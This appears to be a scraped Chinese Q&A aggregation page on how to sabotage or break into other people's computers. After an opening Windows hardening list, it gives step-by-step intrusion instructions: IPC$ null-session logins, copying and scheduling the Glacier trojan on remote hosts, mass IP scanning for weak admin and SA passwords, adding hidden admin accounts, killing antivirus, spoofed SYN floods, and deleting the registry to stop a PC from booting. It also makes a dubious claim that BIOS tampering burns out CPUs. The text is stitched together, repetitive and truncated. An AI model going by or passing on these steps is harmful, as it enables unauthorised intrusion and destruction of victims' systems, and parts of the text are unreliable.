1.怎样破坏电脑系统?让电脑开不了机

2.怎么攻击电脑?

3.如何破坏电脑系统内部,不被发现

4.怎么样黑进别人的电脑?

怎样破坏别人电脑系统,如何破坏别人电脑不被发现

1、禁止IPC空连接: cracker可以利用net use命令建立空连接,进而入侵,还有net view,nbtstat这些都是基于空连接的,禁止空连接就好了。打开注册表,找到 Local_MachineSystemCurrentControlSetControlLSA-RestrictAnonymous 把这个值改成”1”即可。 2、禁止at命令: cracker往往给你个木马然后让它运行,这时他就需要at命令了。打开管理工具-服务,禁用task scheduler服务即可。 3、关闭超级终端服务 如果你开了的话。这个漏洞都烂了,我不说了。 4、关闭SSDP Discover Service服务 这个服务主要用于启动家庭网络设备上的UPnP设备,服务同时会启动5000端口。可能造成DDOS攻击,让CPU使用达到100%,从而使计算机崩溃。照理说没人会对个人机器费力去做DDOS,但这个使用过程中也非常的占用带宽,它会不断的向外界发送数据包,影响网络传输速率,所以还是关了好。 5、关闭Remote Regisry服务 看看就知道了,允许远程修改注册表?除非你真的脑子进水了。 6、禁用TCP/IP上的NetBIOS 网上邻居-属性-本地连接-属性-Internet协议(TCP/IP)属性-高级-WINS面板-NetBIOS设置-禁用TCP/IP上的NetBIOS。这样cracker就无法用nbtstat命令来读取你的NetBIOS信息和网卡MAC地址了。 7、关闭DCOM服务 这就是135端口了,除了被用做查询服务外,它还可能引起直接的攻击,关闭方法是:在运行里输入dcomcnfg,在弹出的组件服务窗口里选择默认属性标签,取消“在此计算机上启用分布式COM”即可。 8、把共享文件的权限从”everyone”组改成“授权用户” “everyone” 在win2000中意味着任何有权进入你的网络的用户都能够获得这些共享资料。任何时候都不要把共享文件的用户设置成”everyone”组。包括打印共享,默认的属性就是”everyone”组的,一定不要忘了改。 9、取消其他不必要的服务 请根据自己需要自行决定,下面给出HTTP/FTP服务器需要最少的服务作为参考: l Event Log l License Logging Service l Windows NTLM Security Support Provider l Remote Procedure Call (RPC) Service l Windows NT Server or Windows NT Workstation l IIS Admin Service l MSDTC l World Wide Web Publishing Service l Protected Storage 10、更改TTL值 cracker可以根据ping回的TTL值来大致判断你的操作系统,如: TTL=107(WINNT); TTL=108(win2000); TTL=127或128(win9x); TTL=240或241(linux); TTL=252(solaris); TTL=240(Irix); 实际上你可以自己更改的:HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesTcpipParameters:DefaultTTL REG_DWORD 0-0xff(0-255 十进制,默认值128)改成一个莫名其妙的数字如258,起码让那些小菜鸟晕上半天,就此放弃入侵你也不一定哦。 11、账户安全 首先禁止一切账户,除了你自己,呵呵。然后把Administrator改名。我呢就顺手又建了个Administrator账户,不过是什么权限都没有的那种,然后打开记事本,一阵乱敲,复制,粘贴到“密码”里去,呵呵,来破密码吧~!破完了才发现是个低级账户,看你崩溃不? 12、取消显示最后登录用户 HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsNTCurrent VersionWinlogon:DontDisplayLastUserName把值改为1。 13、删除默认共享 有人问过我一开机就共享所有盘,改回来以后,重启又变成了共享是怎么回事,这是2K为管理而设置的默认共享,必须通过修改注册表的方式取消它: HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesLanmanServerParameters: AutoShareServer类型是REG_DWORD把值改为0即可。 14、禁用LanManager 身份验证 Windows NT Servers Service Pack 4 和后续的版本都支持三种不同的身份验证方法: LanManager (LM) 身份验证;Windows NT(也叫NTLM)身份验证;Windows NT Version 2.0 (也叫NTLM2) 身份验证; 默认的情况下,当一个客户尝试连接一台同时支持LM 和 NTLM 身份验证方法的服务器时,LM 身份验证会优先被使用。所以建议禁止LM 身份验证方法。 1. 打开注册表编辑器; 2. 定位到 HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlLsa; 3. 选择菜单“编辑”,“添加数值”; 4. 数值名称中输入:LMCompatibilityLevel ,数值类型为:DWORD,单击 确定; 5. 双击新建的数据,并根据具体情况设置以下值: 0 - 发送 LM 和 NTLM响应; 1 - 发送 LM 和 NTLM响应; 2 - 仅发送 NTLM响应; 3 - 仅发送 NTLMv2响应;(Windows 2000有效) 4 - 仅发送 NTLMv2响应,拒绝 LM;(Windows 2000有效) 5 - 仅发送 NTLMv2响应,拒绝 LM 和 NTLM;(Windows 2000有效) 6. 关闭注册表编辑器; 7. 重新启动机器; 好了,就说到这里,按我说的设置完毕,再加上一个网络防火墙,一个病毒防火墙,基本上一般的安全是能保证的,除非你自己非要泄露你的资料。本文主要面向菜鸟,略过了一些高级和复杂的设置,毕竟个人电脑被真正黑客攻击的可能较小,大多数搞破坏的都是只会用几个工具的小菜鸟。

怎样破坏电脑系统?让电脑开不了机

鼠标右键单击我的电脑-属性-硬件-设备管理器,你可以找到DVD/CD-ROM驱动器,把里面的驱动全部停用,这样光驱就会失效了,需要的时候在启用。

这时在给机器设上密码,没问题了。他要是知道怎样启用,就把光驱线拔了!右击我的电脑----属性----硬件-----设备管理———右键DVD光驱------停用要在保密下进行。这样他的光盘就没办法用了。

可以试着装一些还原软件如冰点(类似网吧的关机后所有的全部恢复原样)他要玩游戏每次都要下载,当然如果他不嫌烦的话就没用了

或者进入BIOS,把里面的所有的选项魔改一通,十有八九可以把电脑搞坏。

怎么攻击电脑?

删除注册表就会使电脑系统瘫痪,开不了机。

注册表(Registry)是Microsoft Windows中的一个重要的数据库,用于存储系统和应用程序的设置信息。如果被篡改或删除的话,系统就会瘫痪,电脑开不了机。

删改破坏注册表的方法很简单,只要点击开始→运行在打开栏内输入“regedit“,然后删除其部分或全部内容即可。

如何破坏电脑系统内部,不被发现

问题一:如何攻击别人的电脑 教你如何远程攻击别人的电脑(黑客教程)

1,傻瓜级入侵

之所以说这是傻瓜级,因为这个方法完全不用动脑子,并且保守的说,照这个方法,两个小时内肯定至少能入侵3台电脑!3台绝对是保守的数目!

需要软件:WinntAutoAttack (版本:V2.0) Remote Administrator v2.0(简称RA) 3389登陆器(xp自带的有,要是xp,就不要下载了,就是开始-所有程序-附件-通讯-远程桌面连接

不知道在哪下?用百度搜!我最不喜欢的就是当在群里我告诉别人用什么软件后,他还喋喋不休的问我在哪下?把地址给我吧,太懒了吧,难道下载地址在我脑子里?我不也是要搜吗?

好了,下边我们开始入侵了,下边就是过程:

第一步. 打开WinntAutoAttack,就是那个手雷的标志,在起始ip里和目标ip里填上一个ip段,并且尽量把范围搞大点,比如在起始ip里填218.88.1.1,在目标ip里填218.88.255.255.ip段建议下一个显ip的qq,参考你qq上好友的ip去填.中奖概率更大!勾上仅对ping检查成功的机器进行检测,检测3389端口和收集netbios信息

在IIS溢出选项卡里勾上开99端口shell,这个是用来开99端口telnet的,要是你不会用telnet,这个就不要勾了. 在简单管理员密码选项卡里勾上列出所有密码简单的管理帐号和上传并安装远程图形控制软件. 在sql漏洞选项卡里也一样,就是把三个框都打上勾,就是列出密码为空的sa帐号建立系统管理员帐号(shanlu)和上传并安装远程图形控制软件.

好了,连上网(你不会连网都没连吧?)根据你机器的性能,把线程调下,就是拖那个小滑块,越往右线程越大,要是你的机器性能不好,太大的线程会死机的!我的机器性能不错,我才用110左右的线程,并且有的时候我也会死机... ...(哭... ...)

ok!一切就绪!点开始 . 接下来,接下来我们干什么呢?在qq上聊天吧,等结果吧

第二步. 时间很快就过去了,过了半个小时了吧,我们看看有没有什么结果,点信息,把上边的废话框内容往下拉

主机:218.88.55.55

3389,Windows 2000 Advance Server Terminal 端口开放。

SQL漏洞:

sa帐号密码为空。

建立系统管理员帐号shanlu()成功

哈哈,有肉鸡了,这个是3389的肉鸡,我们用3389的登陆器登陆上去,填上他的ip,用户名是shanlu,密码是空,他的机器就展现在我们面前了!

要是有这样的提示:

主机:218.88.55.55

3389,Windows 2000 Advance Server Terminal 端口开放。

简......>>

问题二:知道对方的IP,如何攻击对方的电脑? 1.取得对方IP地址如XX.XX.XX.XX,方法太多不细讲了。2.判断对方上网的地点,开个DOS窗口键入 TRACERT XX.XX.XX.XX 第4和第5行反映的信息既是对方的上网地点。3.得到对方电脑的名称,开个DOS窗口键入 NBTSTAT -A XX.XX.XX.XX 第一行是对方电脑名称 第二行是对方电脑所在工作组 第三行是对方电脑的说明4.在Windows目录下有一文件供为LMHOSTS.SAM,将其改名为LMHOSTS,删除其内容,将对方的IP及电脑名按以下格式写入文件: XX.XX.XX.XX 电脑名5.开DOS窗口键入 NBTSTAT -R6.在开始-查找-电脑中输入对方电脑名,出现对方电脑点击即可进入。以上方法请不要乱用,本人对你用上面的方法所惹出的麻烦概不负责,请慎重。 对付上面进攻的最好办法就是隐藏你的IP地址。

问题三:怎么攻击别人的电脑 攻击别人电脑不是那么好弄的 而且不知道你的意思是攻击别人的电脑 还是要入侵别人的电脑?如果攻击别人的电脑 那么首先你是需要有大量的肉鸡 一台电脑相当于一台肉鸡 用远控来上线 之后查到对方的IP地址 看看是否能PING通 然后用大量肉鸡里的流量去攻击对方电脑 轻者可使对方电脑网速变慢、死机,重者完全可以损坏对方的电脑。不过要有大量肉鸡是很不容易的 需要有一个免杀的木马才可以。如果要是入侵对方的电脑 这个更麻烦 查到对方IP 然后还需要扫描对方电脑的弱口令 进行猜解等等 一般对方电脑如果开启1433、3389、135等这些高危端口 也是比较容易入侵的 不过我说的这两种是很麻烦的 还是建议你不要考虑这些了

问题四:怎么用CMD攻击个人电脑? 64132是端口号

搞小破坏方法不建议使用,如果想开个玩笑,去下载个扫描工具,针对IP看有什么漏洞,然后根据具体漏洞实施入侵(具体就不详细说了,免得带坏你呵呵)取得ADMIN帐户就可以为所欲为了

问题五:怎么攻击别人电脑 这又何苦这样

提起黑客,总是那么神秘莫测。在人们眼中,黑客是一群聪明绝顶,精力旺盛的年轻人,一门心思地破译各种密码,以便偷偷地、未经允许地打入 *** 、企业或他人的计算机系统,窥视他人的隐私。那么,什么是黑客呢?

黑客(hacker),源于英语动词hack,意为“劈,砍”,引申为“干了一件非常漂亮的工作”。在早期麻省理工学院的校园俚语中,“黑客”则有“恶作剧”之意,尤指手法巧妙、技术高明的恶作剧。在日本《新黑客词典》中,对黑客的定义是“喜欢探索软件程序奥秘,并从中增长了其个人才干的人。他们不象绝大多数电脑使用者那样,只规规矩矩地了解别人指定了解的狭小部分知识。”由这些定义中,我们还看不出太贬义的意味。他们通常具有硬件和软件的高级知识,并有能力通过创新的方法剖析系统。“黑客”能使更多的网络趋于完善和安全,他们以保护网络为目的,而以不正当侵入为手段找出网络漏洞。

另一种入侵者是那些利用网络漏洞破坏网络的人。他们往往做一些重复的工作(如用暴力法破解口令),他们也具备广泛的电脑知识,但与黑客不同的是他们以破坏为目的。这些群体成为“骇客”。当然还有一种人兼于黑客与入侵者之间。

一般认为,黑客起源于50年代麻省理工学院的实验室中,他们精力充沛,热衷于解决难题。60、70年代,“黑客”一词极富褒义,用于指代那些独立思考、奉公守法的计算机迷,他们智力超群,对电脑全身心投入,从事黑客活动意味着对计算机的最大潜力进行智力上的自由探索,为电脑技术的发展做出了巨大贡献。正是这些黑客,倡导了一场个人计算机革命,倡导了现行的计算机开放式体系结构,打破了以往计算机技术只掌握在少数人手里的局面,开了个人计算机的先河,提出了“计算机为人民所用”的观点,他们是电脑发展史上的英雄。现在黑客使用的侵入计算机系统的基本技巧,例如破解口令(password cracking),开天窗(trapdoor),走后门(backdoor),安放特洛伊木马(Trojan horse)等,都是在这一时期发明的。从事黑客活动的经历,成为后来许多计算机业巨子简历上不可或缺的一部分。例如,苹果公司创始人之一乔布斯就是一个典型的例子。

在60年代,计算机的使用还远未普及,还没有多少存储重要信息的数据库,也谈不上黑客对数据的非法拷贝等问题。到了80、90年代,计算机越来越重要,大型数据库也越来越多,同时,信息越来越集中在少数人的手里。这样一场新时期的“圈地运动”引起了黑客们的极大反感。黑客认为,信息应共享而不应被少数人所垄断,于是将注意力转移到涉及各种机密的信息数据库上。而这时,电脑化空间已私有化,成为个人拥有的财产,社会不能再对黑客行为放任不管,而必须采取行动,利用法律等手段来进行控制。黑客活动受到了空前的打击。

但是, *** 和公司的管理者现在越来越多地要求黑客传授给他们有关电脑安全的知识。许多公司和 *** 机构已经邀请黑客为他们检验系统的安全性,甚至还请他们设计新的保安规程。在两名黑客连续发现网景公司设计的信用卡购物程序的缺陷并向商界发出公告之后,网景修正了缺陷并宣布举办名为“网景缺陷大奖赛”的竞赛,那些发现和找到该公司产品中安全漏洞的黑客可获1000美元奖金。无疑黑客正在对电脑防护技术的发展作出贡献。

2,黑客攻击

一些黑客往往回采取一些几种方法,但是我很想说的是,一个优秀的黑客绝不会随便攻击别人的。

1)、获取口令

这又有三种方法:一是通过网络监听非法得到用户口令,这类方法有一定的局限性,但危害性极大,监听者往往能够获得其所在网段的所有用户......>>

问题六:如何在自己电脑上攻击他人电脑? 其实攻击别人的电脑不是最让人头痛的办法,要是共同的网线,就下载一个P2P终结者软件,控制他的流量,急死他! 下面是如何攻击别人电脑,给你一个网址,你自己可以去学一学,上面有很多方法的hi.baidu/...a (一):shed.exe

(二)流光2000

(三)cmd.exe (其实就是2000下的dos啦)!

(四)冰河8.4 操作系统:win2000 server 或者winxp系统。 “shed.exe”:其实就是用来网上查共享资源的,速度快,可以查到很多服务断的共项文件,不过在这里面有些ip在浏览器中无法访问,这是因为其中也包含了个人上网的ip.呵呵!一些作网站,网吧的服务器一些目录都是共享的,有些是可以访问,但是不能删除,因为你所访问的都是以匿名访问的,所以权限不够!有些需要密码。遇到密码怎办?用流光! “流光”虽说对202作了限制,但是对小日本的ip可是没有限制的,呵呵!所以说使用流光的ipc探测,建立一个空对话,查到用户列表,然后先简单探测,此时有些网管懒惰,把administrator设置的过于简单,呵呵,你就可以抓到了。

下一步如何做呢?也许在你查对方的端口时发现对方开的端口很少,比如ftp没开,怎办呢?冰河! “冰河”,想必许多朋友都玩过,使用冰河控制一台服务器速度很快,(因为服务器那边带宽很大)几分钟就可以查到对方主机的主页所在位置。但是如何上传并且控制他呢? “cmd.exe” 是2000下的dos了,执行cmd.exe 使用net命令,

具体操作如下:

第一步:net use \\ip\ipc$ “password” /user:”user” 说明:以一个超级用户名与你想黑的网站建立联接,当然超级用户必须是该网站admin里的。这里的”ip”就是主机了,“password”就是超级用户的密码,“user”就是超级用户。比如:net use \\210.248.250.2\ipc$ “maozhiie” /user:maozhijie

第二步:copy g-server.exe \\ip\admin$\system32 说明:g-server.exe就是冰河的远程服务器端。意义:将此文件拷贝到对方的主机winnt里的system32目录里。也许有人要问木马侵入对方那边可以察觉出来的吧,呵呵!装了防火墙估计可以,不过很多主机没钱买呀!不像中国盗版满天飞!如果你有最新的木马也可以的!这是最好的了!!嘿嘿……

第三步:net time \\ip 察看对方的服务器时间。由于有时差,应该是一个小时吧!所以必须要以对方的服务器时间为准。

第四步:at \\ip time g-server.exe 这里的time就是对方的主机时间。作用:在规定时间执行该程序。比如 at \\210.248.250.2 19:55 g-server.exe 第五步:冰河就可以控制该电脑了。这个我就不说了吧,呵呵!菜鸟也会......>>

问题七:怎样攻击别人的电脑、或者是系统。 知道对方的IP,然后用攻击软件进行攻击,具体的方法就不是一二天能学会的了,也不是一句话两句话能说清楚的,就这样一个单纯的攻击就可以写一本书。

问题八:知道对方电脑的IP地址,怎么对其进行攻击他的电脑 知道对方IP入侵别人的电脑

黑客已经成为一种文化,很多人想成为黑客,他们偶尔学到了几种小花招,总喜欢拿别人开玩笑,搞些恶作剧。其实黑客的最高境界在于防守,不在于进攻。所谓明枪易躲暗箭难防,要防住他人所有的进攻,肯定需要懂得比对方更多的系统知识,了解更多的系统漏洞,及如何弥补漏洞。现在满天都是黑客教程,但真正有用的不多,下面介绍一种WIN9X下的入侵方法: 1.取得对方IP地址如XX.XX.XX.XX,方法太多不细讲了。 2.判断对方上网的地点,开个DOS窗口键入 TRACERT XX.XX.XX.XX 第4和第5行反映的信息既是对方的上网地点。 3.得到对方电脑的名称,开个DOS窗口键入 NBTSTAT -A XX.XX.XX.XX 第一行是对方电脑名称 第二行是对方电脑所在工作组第三行是对方电脑的说明 4.在Windows目录下有一文件名为LMHOSTS.SAM,将其改名为LMHOSTS,删除其内容,将对方的IP及电脑名按以下格式写入文件: XX.XX.XX.XX 电脑名 5.开DOS窗口键入 NBTSTAT -R 6.在开始-查找-电脑中输入对方电脑名,出现对方电脑点击即可进入。以上方法请不要乱用,本人对你用上面的方法所惹出的麻烦概不负责,请慎重。 对付上面进攻的最好办法就是隐藏你的IP地址。注释掉的------>

黑客已经成为一种文化,很多人想成为黑客,他们偶尔学到了几种小花招,总喜欢拿别人开玩笑,搞些恶作剧。其实黑客的最高境界在于防守,不在于进攻。所谓明枪易躲暗箭难防,要防住他人所有的进攻,肯定需要懂得比对方更多的系统知识,了解更多的系统漏洞,及如何弥补漏洞。现在满天都是黑客教程,但真正有用的不多,下面介绍一种WIN9X下的入侵方法: 1.取得对方IP地址如XX.XX.XX.XX,方法太多不细讲了。 2.判断对方上网的地点,开个DOS窗口键入 TRACERT XX.XX.XX.XX 第4和第5行反映的信息既是对方的上网地点。 3.得到对方电脑的名称,开个DOS窗口键入 NBTSTAT -A XX.XX.XX.XX 第一行是对方电脑名称 第二行是对方电脑所在工作组第三行是对方电脑的说明 4.在Windows目录下有一文件名为LMHOSTS.SAM,将其改名为LMHOSTS,删除其内容,将对方的IP及电脑名按以下格式写入文件: XX.XX.XX.XX 电脑名 5.开DOS窗口键入 NBTSTAT -R 6.在开始-查找-电脑中输入对方电脑名,出现对方电脑点击即可进入。以上方法请不要乱用,本人对你用上面的方法所惹出的麻烦概不负责,请慎重。 对付上面进攻的最好办法就是隐藏你的IP地址

hackant/?u=11714

问题九:黑客是如何攻击别人的电脑的? 黑客常常利用电子邮件系统的漏洞,结合简单的工具就能达到攻击目的。一同走进黑客的全程攻击,了解电子邮件正在面临的威胁和挑战……毫无疑问,电子邮件是当今世界上使用最频繁的商务通信工具,据可靠统计显示,目前全球每天的电子邮件发送量已超过500亿条,预计到2008年该数字将增长一倍。电子邮件的持续升温使之成为那些企图进行破坏的人所日益关注的目标。如今,黑客和病毒撰写者不断开发新的和有创造性的方法,以期战胜安全系统中的改进措施。出自邮件系统的漏洞典型的互联网通信协议――TCP和UDP,其开放性常常引来黑客的攻击。而IP地址的脆弱性,也给黑客的伪造提供了可能,从而泄露远程服务器的资源信息。防火墙只控制基于网络的连接,通常不对通过标准电子邮件端口(25端口)的通信进行详细审查。一旦企业选择了某一邮件服务器,它基本上就会一直使用该品牌,因为主要的服务器平台之间不具互操作性。以下分别概述了黑客圈中一些广为人知的漏洞,并阐释了黑客利用这些安全漏洞的方式。一、IMAP 和 POP 漏洞密码脆弱是这些协议的常见弱点。各种IMAP和POP服务还容易受到如缓冲区溢出等类型的攻击。二、拒绝服务(DoS)攻击1.死亡之Ping――发送一个无效数据片段,该片段始于包结尾之前,但止于包结尾之后。2.同步攻击――极快地发送TCP SYN包(它会启动连接),使受攻击的机器耗尽系统资源,进而中断合法连接。3.循环――发送一个带有完全相同的源/目的地址/端口的伪造SYN包,使系统陷入一个试图完成TCP连接的无限循环中。三、系统配置漏洞企业系统配置中的漏洞可以分为以下几类:1.默认配置――大多数系统在交付给客户时都设置了易于使用的默认配置,被黑客盗用变得轻松。2.空的/默认根密码――许多机器都配置了空的或默认的根/管理员密码,并且其数量多得惊人。3.漏洞创建――几乎所有程序都可以配置为在不安全模式下运行,这会在系统上留下不必要的漏洞。面说说吧,希望你能从中领略一些道理.

问题十:电脑被攻击了,怎么办 安装杀毒软件和防火墙,拒绝攻击即可。

DoS是Denial of Service的简称,即拒绝服务,造成DoS的攻击行为被称为DoS攻击,其目的是使计算机或网络无法提供正常的服务。最常见的DoS攻击有计算机网络带宽攻击和连骇性攻击。带宽攻击指以极大的通信量冲击网络,使得所有可用网络资源都被消耗殆尽,最后导致合法的用户请求就无法通过。连通性攻击指用大量的连接请求冲击计算机,使得所有可用的操作系统资源都被消耗殆尽,最终计算机无法再处理合法用户的请求。

怎么样黑进别人的电脑?

在开机后按del进入BIOS设置,然后乱调,把可以调的项目的参数一律调到最高,保存 ,重启,开机后一般在4、5分钟内即可烧毁CPU或使主板电容爆浆。如果还不行运行占资源超大的文件,应该在几秒之内就能把电脑“干掉”了、。

问题一:黑客到底是怎么黑进别人的电脑的 windows比较麻烦,linux操作系统操作起来简单些。

比如就用windows进行最简单的DoS攻击吧。

1.由于windows不允许更改底层网络数据包(linux可以改),因此先要链接winpcap环境。

2.在winpcap的保护下,对数据包进行修改,针对TCP segment,包含于IP datagram

3.将TCP segment,SYN设为1,ACK设为0,一定要把sender改成一个不存在的地址!这是DoS攻击的精髓。

4.然后不停的发吧,把某某IP客户端发到瘫痪为止 呵呵。

5.高级点的话诸如shellcode,到客户端内运行,夺取系统Sid,得到管理员操作权,再想办法把帐户隐藏,呵呵,随心所欲吧。。。

问题二:怎么进入别人的计算机 黑客技术 怎么黑进别人的电脑 步骤:1、首先要获得对方的IP地址。2、接着用端口扫描器判断对方开放了那些端口,分析对方使用的操作系统。3、接下来就是寻找可用的有漏洞的端口,通过漏洞端口连接对方的电脑。4、然后将更具破坏性的木马或诱探程序,通过漏洞传输到对方电脑。5、最后就是通过传输的破坏程序,给对方电脑搞出更大的漏洞(也就是先开一个小门进去,然后再扩大这扇门),这时就该想办法完全控制对方的电脑。

问题三:如何通过网络进入别人的电脑 如何一步一步进入别人计算机!

跟着TTY一步一步走进对方计算机:

这道快餐是专门为从来没有通过网络进入过对方计算机的网络新手们准备的,主要使用的软件就是著名的国产木马冰河2.2,所以,如果你已经使用过冰河2.2,就不必跟着我们往下走了。其他有兴趣的网络新手们,Let's go!

第一步 下载网络新手快餐软件包 tty.zip到网络休闲庄(atty.126)“红客软件”->>“中文软件”里下载网络新手快餐软件包,文件名是:tty.zip。该软件包里准备了本次实验所需的所有软件,大小811K。解开tty.zip,里面应有1号、2号、两个软件,是为了叙述方便而编的号,1号软件就是端口扫描工具“网络刺客II”,2号软件就是著名的国产木马冰河2.2的控制端。下载完毕并解压缩之后跟我进行第二步!

第二步

运行1号软件,首先出现的是“网络刺客II注册向导”,别理它,点击“稍后(Q)”就进入了网络刺客II的主界面。

第三步 在网络刺客II的主界面里选“工具箱(U)”-》“主机查找器(H)”,就进入了“搜索因特网主机”界面。

第四步 进入“搜索因特网主机”界面后,“起始地址”栏填XXX.XXX.0.0其中XXX.XXX自己去选择了,比如你可以选61.128或选61.200等等,“结束地址”栏填XXX.XXX.255.255其中XXX.XXX的选择要和前面一样。“端口”栏填7626,其他栏保持默认不动。好了,以上设置就是要搜索从XXX.XXX.0.0到XXX.XXX.255.255这一段IP地址中有冰河木马的计算机了,再检查一下填对没有?如果一切OK,请点击“开始搜索”。

第五步 观察“总进度”和“段进度”是否在走动。如果没有走动,那一定是IP地址设置不对,请认真检查。如果两个进度都在走动,呵呵,你就成功一半了,至少你会使用网络刺客II扫描网上开放某一端口的计算机了。下面你要作的就是静静的等待,学用黑客软件是需要耐心的。大约20-30分钟后,最下面的记录栏里就应该出现记录了(一般情况下,应该有5、6条记录)。每一条记录代表找到的中了冰河木马的一台计算机,前面是该计算机的IP地址,后面是7626(冰河木马端口)。

第六步 点击“停止搜索”,但不要退出程序,到第十二步时还要用。运行2号软件冰河,进入冰河主界面。选“文件[F]”-》“添加主机[A]”进入添加主机窗口。

第七步 在“添加主机”窗口,“显示名称”里填入第五步里搜索到的第一条IP地址,当IP地址填入“显示名称”里后,“主机地址”里就自动填入相同的IP了。“访问口令”不填,“监听端口”保持默认的7626。好了,检查一下IP有没有填错,如果OK,点击“确定”,在冰河主界面的“文件管理器”里就出现了刚才填入的IP地址了。

第八步 这一步和下一步最重要,请认真看清楚!在冰河的主界面里,点击“文件管理器”里的“我的电脑”,这时“文件管理器”右边的框里就会出现你自己的硬盘分区。比如,如果你的硬盘分的是四个区,“文件管理器”右边的框里就会从上往下依次出现C:、D:、E:、F:,如果你的硬盘分的是两个区,就会出现C:、D:。

第九步 点击“文件管理器”里刚才输入的第一条IP地址,稍等片刻(网速慢的情况下约10-30秒),在“文件管理器”右边的框里就会出现对方计算机的硬盘分区了。看到了吗?看......>>

问题四:怎么进入别人的电脑 首先要确定要入侵电脑的IP,关于IP,网吧的编号和IP地址通常是相同或高一位,比如编号为

20的电脑,IP一般是192.168.0.20或192.168.0.21… 大家要是上贴吧匿名发帖子的话,也会

看见IP地址…

有了IP地址后,就可以连接那将被你入侵的倒霉电脑了,一般登陆电脑的用户名多是“user编号”

的形式空密码形式,所以在“命令提示符”下输入net use IP地址/ipc$/user:及

net use IP地址/ipc$/user:user编号命令进行连接

连接成功后必须关闭对方电脑的杀毒软件,右击“我的电脑”,选择“管理”在弹出窗口中右击

“计算机管理(本地)”,选择“连接另一台计算机”,连接至那台倒霉电脑的IP号,启动

“Tenlet”服务

然后在“命令提示符”下输入两条命令在本机新建user20用户并将它添加到管理员组。

net user user编号/add

net localgroup administators user编号/add

然后进入C:\Winnt\System32,右击CMD.EXE,选择“创建快捷方式”,然后右击快捷方式,选择

“属性”,选择“以其他用户身份运行”,运行快捷方式CMD,弹出“以其他用户身份运行”窗

口后,输入“user编号”回车

用telnet 电脑IP编号 登陆至那个倒霉孩子的电脑,再从网上下载一个命令行下杀进程的软件,

比如说knlps等,在telnet上将杀毒软件进程关闭

问题五:怎么才能黑进别人的电脑 不是你想的那么简单!就算详细回答了你也看不懂!先去学习下基础知识吧!

问题六:怎么进入别人的计算机 黑客技术 怎么黑进别人的电脑 不是你想的那么简单!就算详细回答了你也看不懂!先去学习下基础知识吧!

问题七:怎么黑进别人的电脑的相关视频 入侵他人计算机属于刑事犯罪,所以侵入别人的电脑,开启对方摄像头是犯罪行为,请勿尝试学习或攻击。

我国《刑法》中有关计算机犯罪的规定:

1、

《刑法》第285条规定的“非法侵入计算机信息系统罪”,该罪是指违反国家规定,侵入国家事务、国防建设、尖端科学技术领域的计算机信息系统的行为。本罪

所侵犯的客体是国家重要计算机信息系统的安全,犯罪对象是国家事务、国防建设、尖端科学技术领域的计算机信息系统。客观方面表现为违反国家规定,侵入上述

三类计算机信息系统的行为。而主观方面只能是故意,即明知是该类系统而故意侵入。触犯本罪处三年以下有期徒刑或者拘役。

2、《刑法》第286条规定的“破坏计算机信息系统罪”是指违反国家规定,对计算机信息系统功能进行删除、修改、增加、干扰,造成计算机信息系统不能正常

运行,或者对计算机信息系统中存储、处理或传输的数据和应用程序进行删除、修改、增加的操作,或者故意制作、传播计算机病毒等破坏性程序,影响计算机系统

正常运行,后果严重的行为。本罪所侵犯的客体是国家对计算机信息系统的管理制度。客观方面表现为行为人违反国家规定,破坏计算机信息系统,且后果严重的行

为。主观方面只能是故意。触犯该罪的,处五年以下有期徒刑或者拘役,后果特别严重的,处五年以上有期徒刑。

问题八:怎么才能黑进别人的电脑 有专门的企鹅群的 不过需要技术的 还有黑人家的电脑是违法的 你要考虑下后果的 在群里可以要到一些木马的

问题九:如何黑进一个人的电脑 不要当HACKER。记住:一定要使用HACKER的技术做HONKER的事情,这才是最最令人敬佩的。